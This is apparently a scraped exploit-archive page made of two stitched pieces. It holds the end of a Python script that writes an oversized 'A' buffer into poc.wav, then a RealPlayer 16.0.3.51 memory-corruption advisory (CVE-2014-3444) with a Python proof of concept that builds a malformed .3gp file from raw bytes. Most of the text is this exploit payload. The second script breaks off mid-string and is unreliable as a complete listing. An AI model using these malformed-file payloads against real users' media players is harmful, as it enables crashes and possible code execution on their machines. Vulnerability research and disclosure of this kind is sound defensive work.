1\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
outfile = file("poc.wav", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"
HireHackking 
source: https://www.securityfocus.com/bid/67434/info

RealPlayer is prone to a memory-corruption vulnerability.

An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.

Realplayer 16.0.3.51 is vulnerable; other versions may also be affected. 

# Exploit Title: [Realplayer memory corruption in latest Version 16.0.3.51 ]
# Date: [2014/05/13]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.real.com]
# Software Link: [
http://www.filehippo.com/download_realplayer/download/9b931239de41b8dce664656f25e1c28b/
]
# Version: [Version 16.0.3.51 and prior to that]
# Tested on: [Windows Xp Sp 3 x86, Windows 7 Sp1 x86]
# CVE : [CVE-2014-3444]

details:

Realplayer latest version 16.0.3.51 suffers from an  memory corruption
Vulnerability via  a malformed .3gp file format when

load RealPlayer\codecs\dmp4.dll .

####Note:it's Exploitable , But Not Stable.####


Poc:

#!/usr/bin/python
data
="\x00\x00\x00\x18\x66\x74\x79\x70\x33\x67\x70\x36\x00\x00\x01\x00\x69\x73\x6F\x6D\x33\x67\x70\x36\x00\x00

\x0F\x2D\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x02\x58

\x00\x00\x19\xFA\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x15\x69

\x6F\x64\x73\x00\x00\x00\x00\x10\x07\x00\x4F\xFF\xFF\x28\x08\xFF\x00\x00\x05\xA4\x74\x72\x61\x6B\x00\x00\x00\x5C\x74

\x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x19\xFA\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\xB0\x00\x00\x00\x90\x00\x00\x00\x00\x05

\x40\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x0C\x00

\x00\x00\x85\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x76\x69\x64\x65\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69\x6C\x65\x20\x50\x72\x6F\x64\x75\x63\x65

\x64\x20\x62\x79\x20\x47\x6F\x6F\x67\x6C\x65\x2C\x20\x35\x2D\x31\x31\x2D\x32\x30\x31\x31\x00\x00\x00\x04\xCC\x6D\x69

\x6E\x66\x00\x00\x00\x14\x76\x6D\x68\x64\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x64\x69\x6E\x66

\x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00\x00\x00\x01\x00\x00

\x04\x8C\x73\x74\x62\x6C\x00\x00\x00\xB8\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xA8\x6D\x70\x34\x76

\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB0\x00\x90\x00\x48

\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\xFF\xFF\x00\x00\x00\x52\x65\x73\x64\x73\x00\x00\x00\x00

\x03\x44\x00\x00\x00\x04\x3C\x20\x11\x00\x07\x61\x00\x01\x19\xE8\x00\x00\xCD\xE0\x05\x2D\x00\x00\x01\xB0\x08\x00\x00\x01

\xB5\x89\x13\x00\x00\x01\x00\x00\x00\x01\x20\x00\xC4\x8D\x88\x00\x65\x05\x84\x12\x14\x63\x00\x00\x01\xB2\x4C\x61\x76\x63

\x35\x32\x2E\x34\x31\x2E\x30\x06\x01\x02\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x85

\x00\x00\x00\x01\x00\x00\x00\x1C\x73\x74\x73\x73\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x3D\x00\x00

\x00\x79\x00\x00\x01\x00\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x01

\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00

\x00\x06\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00\x01

\x00\x00\x00\x09\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0A\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0B\x00\x00

\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0D\x00\x00\x00\x05\x00\x00\x00\x01

\x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00

\x00\x06\x00\x00\x00\x01\x00\x00\x00\x12\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x06\x00\x00\x00\x01

\x00\x00\x00\x14\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x15\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x17\x00\x00

\x00\x05\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x02\x28\x73\x74\x73\x7A\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x85\x00\x00\x07\x61\x00\x00\x00\xB6\x00\x00\x01\x72\x00\x00\x01\x70\x00\x00\x01\xDC\x00\x00

\x01\xFF\x00\x00\x02\x54\x00\x00\x02\x37\x00\x00\x02\x25\x00\x00\x02\x48\x00\x00\x02\x2C\x00\x00\x02\x3B\x00\x00\x02\x62

\x00\x00\x02\x4E\x00\x00\x02\x81\x00\x00\x02\xD9\x00\x00\x03\x05\x00\x00\x02\x5F\x00\x00\x03\x8B\x00\x00\x02\xDD\x00\x00

\x02\xB8\x00\x00\x02\xD7\x00\x00\x02\x90\x00\x00\x02\xA3\x00\x00\x02\x33\x00\x00\x02\x3E\x00\x00\x02\x2F\x00\x00\x02\x22

\x00\x00\x02\x31\x00\x00\x02\x0C\x00\x00\x02\x76\x00\x00\x01\xF4\x00\x00\x02\x03\x00\x00\x02\x22\x00\x00\x04\x27\x00\x00

\x02\x45\x00\x00\x02\x19\x00\x00\x02\x14\x00\x00\x03\x55\x00\x00\x02\x27\x00\x00\x01\xDF\x00\x00\x03\xDB\x00\x00\x02\x62

\x00\x00\x02\x20\x00\x00\x03\x5D\x00\x00\x01\xE6\x00\x00\x01\xE3\x00\x00\x03\xA0\x00\x00\x02\x3A\x00\x00\x02\x12\x00\x00

\x03\x4C\x00\x00\x01\xD4\x00\x00\x01\xD2\x00\x00\x01\xC5\x00\x00\x04\x0B\x00\x00\x02\x08\x00\x00\x01\xFA\x00\x00\x03\x68

\x00\x00\x01\xC6\x00\x00\x01\x94\x00\x00\x05\x5E\x00\x00\x00\xFD\x00\x00\x02\xF1\x00\x00\x03\xCC\x00\x00\x02\x4A\x00\x00

\x03\x47\x00\x00\x01\x71\x00\x00\x01\x77\x00\x00\x01\xA5\x00\x00\x01\x1D\x00\x00\x02\x31\x00\x00\x02\x6C\x00\x00\x02

\x5F\x00\x00\x02\x2A\x00\x00\x01\xD3\x00\x00\x02\x1D\x00\x00\x01\x71\x00\x00\x02\x04\x00\x00\x02\x7D\x00\x00\x01\x62\x00

\x00\x01\x9E\x00\x00\x01\x7D\x00\x00\x01\xBC\x00\x00\x01\xAD\x00\x00\x01\xDC\x00\x00\x01\x76\x00\x00\x01\xBF\x00\x00\x01

\x48\x00\x00\x01\xD7\x00\x00\x02\x29\x00\x00\x02\x03\x00\x00\x02\x7C\x00\x00\x01\x77\x00\x00\x01\x6F\x00\x00\x01\x2A\x00

\x00\x01\xE0\x00\x00\x01\x7E\x00\x00\x01\x72\x00\x00\x01\x81\x00\x00\x01\x90\x00\x00\x01\xC4\x00\x00\x01\x1B\x00\x00\x01

\x73\x00\x00\x02\x02\x00\x00\x01\x36\x00\x00\x01\x5A\x00\x00\x01\x8C\x00\x00\x02\x1B\x00\x00\x01\xB7\x00\x00\x01\xC2\x00

\x00\x01\xAC\x00\x00\x01\xDA\x00\x00\x01\x8B\x00\x00\x01\x63\x00\x00\x01\xB5\x00\x00\x01\x76\x00\x00\x01\x52\x00\x00\x01

\x84\x00\x00\x01\x6C\x00\x00\x01\xBF\x00\x00\x06\x65\x00\x00\x01\x86\x00\x00\x02\x03\x00\x00\x00\xEF\x00\x00\x01\xE1\x00

\x00\x03\x13\x00\x00\x02\x40\x00\x00\x01\x86\x00\x00\x01\xB0\x00\x00\x01\xD1\x00\x00\x01\x78\x00\x00\x01\xE5\x00\x00\x01

\xD6\x00\x00\x00\x70\x73\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x0F\x4D\x00\x00\x27\x20\x00\x00\x39\xD5\x00

\x00\x4F\xCF\x00\x00\x62\xBA\x00\x00\x75\x1D\x00\x00\x87\x37\x00\x00\x9A\x85\x00\x00\xAF\x7B\x00\x00\xC2\x04\x00\x00\xD6

\x7D\x00\x00\xE8\xA2\x00\x00\xFC\x16\x00\x01\x0B\xC2\x00\x01\x1C\x5D\x00\x01\x2B\x87\x00\x01\x3A\x12\x00\x01\x49\x8D\x00

\x01\x56\x5B\x00\x01\x65\x6C\x00\x01\x73\x63\x00\x01\x81\x9E\x00\x01\x95\x8F\x00\x01\xA5\x54\x00\x00\x06\x0D\x74\x72\x61

\x6B\x00\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x02\x00\x00\x00\x00\x00

\x00\x19\xE7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x05\xA9\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2

\xCC\x8C\xBA\xF2\x00\x00\x56\x22\x00\x03\xB8\x00\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00

\x00\x00\x73\x6F\x75\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69

\x6C\x65\x20\x50\x72\x6F\x64\x75\x63\x65\x64\x20\x62\x79\x20\x47\x6F\x6F\x67\x6C\x65\x2C\x20\x35\x2D\x31\x31\x2D\x32\x30

\x31\x31\x00\x00\x00\x05\x35\x6D\x69\x6E\x66\x00\x00\x00\x10\x73\x6D\x68\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x24\x64\x69\x6E\x66\x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00

\x00\x00\x01\x00\x00\x04\xF9\x73\x74\x62\x6C\x00\x00\x00\x69\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00

\x59\x6D\x70\x34\x61\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x10\x00\x00\x00\x00\x56

\x22\x00\x00\x00\x00\x00\x35\x65\x73\x64\x73\x00\x00\x00\x00\x03\x27\x00\x00\x00\x04\x1F\x40\x15\x00\x00\xD4\x00\x00\x68

\x50\x00\x00\x5D\xF8\x05\x10\x13\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x01\x02\x00\x00\x00\x18

\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xEE\x00\x00\x04\x00\x00\x00\x00\x34\x73\x74\x73\x63\x00\x00

\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x0A\x00\x00\x00\x01

\x00\x00\x00\x18\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x03\xCC\x73\x74\x73\x7A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\xEE\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\xD4\x00\x00\x00\xB2\x00\x00\x00\xA4\x00\x00\x00\x91\x00\x00\x00\x90

\x00\x00\x00\x92\x00\x00\x00\x90\x00\x00\x00\x92\x00\x00\x00\x96\x00\x00\x00\x89\x00\x00\x00\x82\x00\x00\x00\x84\x00\x00

\x00\x9A\x00\x00\x00\x8B\x00\x00\x00\x92\x00\x00\x00\x89\x00\x00\x00\x80\x00\x00\x00\x7B\x00\x00\x00\x7E\x00\x00\x00\x87

\x00\x00\x00\x90\x00\x00\x00\x88\x00\x00\x00\x82\x00\x00\x00\x82\x00\x00\x00\x81\x00\x00\x00\x9D\x00\x00\x00\x9A\x00\x00

\x00\x88\x00\x00\x00\x80\x00\x00\x00\x87\x00\x00\x00\x84\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x82\x00\x00\x00\x85

\x00\x00\x00\x8F\x00\x00\x00\x8B\x00\x00\x00\x84\x00\x00\x00\x8A\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x8C\x00\x00

\x00\x8C\x00\x00\x00\x85\x00\x00\x00\x95\x00\x00\x00\x88\x00\x00\x00\x87\x00\x00\x00\x8F\x00\x00\x00\x82\x00\x00\x00\x88

\x00\x00\x00\x93\x00\x00\x00\x8A\x00\x00\x00\x92\x00\x00\x00\x86\x00\x00\x00\x88\x00\x00\x00\x89\x00\x00\x00\x86\x00\x00

\x00\x89\x00\x00\x00\x87\x00\x00\x00\x8B\x00\x00\x00\x94\x00\x00\x00\x8A\x00\x00\x00\x89\x00\x00\x00\x89\x00\x00\x00\x88

\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8D\x00\x00\x00\x95\x00\x00\x00\x8D\x00\x00\x00\x86\x00\x00\x00\x8E\x00\x00

\x00\x87\x00\x00\x00\x8C\x00\x00\x00\x8C\x00\x00\x00\x8E\x00\x00\x00\x91\x00\x00\x00\x89\x00\x00\x00\x8B\x00\x00\x00\x90

\x00\x00\x00\x85\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\x90\x00\x00

\x00\x8D\x00\x00\x00\x8B\x00\x00\x00\x8C\x00\x00\x00\x88\x00\x00\x00\x93\x00\x00\x00\x89\x00\x00\x00\x90\x00\x00\x00\x84

\x00\x00\x00\x90\x00\x00\x00\x7F\x00\x00\x00\x8A\x00\x00\x00\x90\x00\x00\x00\x8D\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00

\x00\x93\x00\x00\x00\x7B\x00\x00\x00\x94\x00\x00\x00\x8A\x00\x00\x00\x8D\x00\x00\x00\x95\x00\x00\x00\x8B\x00\x00\x00\x98

\x00\x00\x00\x8F\x00\x00\x00\x8B\x00\x00\x00\x89\x00\x00\x00\x8F\x00\x00\x00\x87\x00\x00\x00\x8B\x00\x00\x00\x90\x00\x00

\x00\x9B\x00\x00\x00\x83\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x84\x00\x00\x00\x8C\x00\x00\x00\x85\x00\x00\x00

\x8E\x00\x00\x00\x95\x00\x00\x00\x92\x00\x00\x00\x8E\x00\x00\x00\x84\x00\x00\x00\x8B\x00\x00\x00\x8A\x00\x00\x00\x89\x00

\x00\x00\x82\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\x86\x00\x00\x00\x8A\x00\x00\x00\x81\x00\x00\x00\x90\x00\x00\x00

\x85\x00\x00\x00\x88\x00\x00\x00\x8E\x00\x00\x00\x93\x00\x00\x00\x91\x00\x00\x00\x85\x00\x00\x00\x81\x00\x00\x00\x81\x00

\x00\x00\x85\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x8F\x00\x00\x00\x89\x00\x00\x00\x87\x00\x00\x00\x8F\x00\x00\x00

\x90\x00\x00\x00\x8F\x00\x00\x00\x86\x00\x00\x00\xA1\x00\x00\x00\x89\x00\x00\x00\x8B\x00\x00\x00\x81\x00\x00\x00\x91\x00

\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00\x92\x00\x00\x00\xAE\x00\x00\x00\x8B\x00\x00\x00\x89\x00\x00\x00\x87\x00\x00\x00

\x8F\x00\x00\x00\x85\x00\x00\x00\x90\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8A\x00\x00\x00\x82\x00\x00\x00\x8B\x00

\x00\x00\x86\x00\x00\x00\x8F\x00\x00\x00\x88\x00\x00\x00\x82\x00\x00\x00\x8C\x00\x00\x00\x97\x00\x00\x00\x86\x00\x00\x00

\x85\x00\x00\x00\x8C\x00\x00\x00\x89\x00\x00\x00\x90\x00\x00\x00\x88\x00\x00\x00\x8C\x00\x00\x00\x99\x00\x00\x00\x8E\x00

\x00\x00\x87\x00\x00\x00\x7F\x00\x00\x00\x85\x00\x00\x00\x8C\x00\x00\x00\x86\x00\x00\x00\x8D\x00\x00\x00\x90\x00\x00\x00

\x83\x00\x00\x00\x8F\x00\x00\x00\x91\x00\x00\x00\x9A\x00\x00\x00\x88\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x8B\x00

\x00\x00\x87\x00\x00\x00\x87\x00\x00\x00\x85\x00\x00\x00\x93\x00\x00\x00\x85\x00\x00\x00\x8C\x00\x00\x00\x99\x00\x00\x00

\x8A\x00\x00\x00\x89\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x8D\x00\x00\x00\x82\x00\x00\x00\x8C\x00\x00\x00\x8B\x00

\x00\x00\x8B\x00\x00\x00\x84\x00\x00\x00\x88\x00\x00\x00\x95\x00\x00\x00\x8D\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00

\x90\x00\x00\x00\x8D\x00\x00\x00\x88\x00\x00\x00\x8E\x00\x00\x00\x91\x00\x00\x00\x98\x00\x00\x00\x88\x00\x00\x00\x70\x73

\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x20\x75\x00\x00\x34\x8D\x00\x00\x4A\x6C\x00\x00\x5D\x6E\x00\x00

\x6F\xB9\x00\x00\x81\xD3\x00\x00\x95\x04\x00\x00\xAA\x08\x00\x00\xBC\x87\x00\x00\xD1\x10\x00\x00\xE3\x23\x00\x00\xF6

\x8C\x00\x01\x06\x59\x00\x01\x17\x06\x00\x01\x26\x33\x00\x01\x34\x91\x00\x01\x43\xFC\x00\x01\x50\xEF\x00\x01\x60\x07\x00

\x01\x6D\xF6\x00\x01\x7C\x33\x00\x01\x90\x1B\x00\x01\x9F\xE9\x00\x01\xAA\x87\x00\x00\x02\xF3\x75\x64\x74\x61\x00\x00\x02

